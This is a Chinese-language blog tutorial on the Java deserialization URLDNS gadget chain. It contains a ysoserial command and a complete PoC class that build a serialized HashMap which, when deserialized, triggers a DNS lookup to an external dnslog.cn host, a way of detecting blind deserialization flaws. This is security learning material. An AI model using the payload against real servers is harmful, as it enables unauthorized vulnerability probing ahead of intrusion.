反序列化-URLDNS链

原创 于 2023-08-16 15:30:36 发布 · 88 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #开发语言 #java #tomcat #kafka

URLDNS利用链

URLDNS利用链特点:

  • 使用Java内置的类构造,对第三方库没有依赖
  • 在目标没有回显的时候,能够通过DNS请求得知是否存在反序列化漏洞
  • 比CommonCollection简单更容易上手

我们可以构造一个反序列化点:

import java.io.FileInputStream;

import java.io.ObjectInputStream;

public class Helloworld{

public static void main(String[] args) throws Exception {

ObjectInputStream ois = new ObjectInputStream(new FileInputStream("yso.bin"));

ois.readObject();

}

}

使用新下载的jar包生成反序列化payload:

java -jar ysoserial-master-d367e379d9-1.jar URLDNS "http://kopboi.dnslog.cn" > yso.bin

运行即可看到dnslog的请求记录;

在Hashmap类的readObject方法putVal()处下断点:

 最终在这里产生了DNS请求

 Gadget:

HashMap.readObject->HashMap.hash()->URL.hashCode()->URLStreamHandler.hashCode()->URL.getHostAddress()->InetAdress.getByName()

但是如果是使用ysoserial生成反序列化数据的话,为啥不会产生DNS请求呢?

原因是在实例化URL类的时候,在这里handler传入了自定义的handler,这里面重写了getHostAddress()所以不会产生DNS请求

getHostAddress方法的时候就会直接return null

 poc

import java.io.*;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.util.Base64;

public class urldns {
    public static void main(String[] args) throws Exception {

        URLStreamHandler handler = new URLStreamHandler() {
            @Override
            protected URLConnection openConnection(URL u) {
                return null;
            }
            @Override
            protected synchronized InetAddress getHostAddress(URL u){
                return null;
            }
        };

        HashMap hm = new HashMap();
        URL url = new URL(null,"http://114.hsr2k5.dnslog.cn\n",handler);
        hm.put(url,url);

        //Reflections.setFieldValue(url,"hashCode",-1);
        Field f = URL.class.getDeclaredField("hashCode");
        f.setAccessible(true);
        f.set(url, -1);

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(hm);
        oos.close();
        //序列化流写入文件
        try
        {
            FileOutputStream fileOut = new FileOutputStream("D:\\tmp\\e.ser");
            ObjectOutputStream out = new ObjectOutputStream(fileOut);
            out.writeObject(hm);
            out.close();
            fileOut.close();
            System.out.println("Serialized data is saved in D:\\tmp\\e.ser");
        }catch(IOException i)
        {
            i.printStackTrace();
        }
        // 本地测试触发
        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}

why811
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值